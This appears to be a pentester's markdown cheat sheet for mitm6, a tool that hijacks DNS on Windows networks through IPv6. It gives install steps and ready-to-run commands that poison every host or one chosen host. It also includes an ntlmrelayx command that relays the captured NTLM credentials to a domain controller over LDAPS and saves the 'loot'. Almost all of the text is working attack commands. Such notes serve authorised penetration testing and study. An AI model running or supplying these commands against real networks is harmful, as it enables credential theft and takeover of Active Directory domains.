# mitm6.py
[mitm6](https://github.com/dirkjanm/mitm6) "is a pentesting tool that exploits the default configuration of Windows to take over the default DNS server."

## Install
```
python3 -m venv venv
source venv/bin/activate
pip install -r requirements.txt
```

## General poisoning of "everybody"
Poisoning IPv6 for fun and profit!

```
sudo python3 mitm6.py -i eth0 -d domain.com 
```
### Poisoning only certain hosts
```
sudo python3 mitm6.py -i eth0 -d domain.com -hw SERVER2
```

*Note: I don't think the -hw flag allows more than one host, but if you find that's not the case, please let me know!*

## Relaying mitm6'd creds
```
ntlmrelayx -6 -t ldaps://ip.of.adomain.controller -wh testupdates.domain.com -l lootme
```
